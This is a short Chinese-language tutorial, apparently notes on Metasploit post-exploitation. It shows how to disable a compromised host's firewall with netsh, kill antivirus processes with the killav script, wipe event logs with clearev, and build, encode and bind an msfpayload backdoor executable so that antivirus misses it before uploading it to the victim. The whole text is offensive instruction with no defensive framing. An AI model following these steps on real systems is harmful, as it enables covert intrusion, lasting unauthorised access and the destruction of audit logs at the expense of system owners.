1. 清楚痕迹
1)禁用防火墙
首先,需要检查防火墙是否启动,在meterpreter中输入run getcountermeasure,就可以查看攻击主机的防火墙设置
PS:如果遇到终端是中文系统,远程乱码,可以点击terminal的set character encoding,添加中文的编码,然后在远程的时候选择中文
meterpreter中打开被攻击系统的shell:netsh firewall show opmode
下一步,禁用:netsh firewall set opmode mode=DISABLE
此时,再去查看防火墙设置如下
2)禁用杀毒软件和日志删除
可以使用killav.rb脚本,metasploit有这个脚本,位置在/opt/metasploit/msf3/scripts/meterpreter里
文本编辑器打开killav.rb脚本,这个脚本里有一些基本的杀毒软件进程
运行会在被攻击系统中寻找包含在该脚本中的进程名,然后关闭
meterpreter中输入run killav,就可以看到进程被关闭了,可以在tasklist里查看
如图关闭了cmd.exe
清理日志:输入clearev可以清理日志,可以通过事件查看器确认是否创建日志
2.后门
后门可以帮助被攻击者维持系统访问,绕过身份认证
可以通过metasploit中内置的攻击载荷来创建后门,首先需要知道payload的目录,位置在/opt/mtasploit/msf3/modules
也可以输入show payloads查看全部攻击载荷
metasploit提供三个辅助工具,分别是msfpayload、msfencode和msfvenom
进入目录/opt/metasploit/msf3/,输入./msfpayload -l 显示所有可用的选项列表,show payloads已经列出攻击载荷列表
选择一个攻击载荷,输入命令./msfpayload xxx(攻击载荷) LHOST = xxx.xxx.xxx.xxx X>(创建的.exe后门要放置的目录),如图,创建之后放在桌面
msf>show encoders可以查看所有可用的编码器列表,可以看到x86/shikata_ga_nai的等级是excellent,因此选择这个编码器
下一步用来绑定到别的exe文件,输入命令./msfpayload (攻击载荷) LHOST=ip -R | (编码器)-c 6 -t exe -x/(文件目录)-o /(输出文件目录)
创建的exe很容易被杀毒软件阻拦,需要进行免杀处理,执行如图所示
把该应用程序传输到被控主机上,被攻击主机使用杀毒软件检测,会发现这个exe不是病毒
可以直接使用upload命令传输,upload (文件路径) (目标主机文件路径)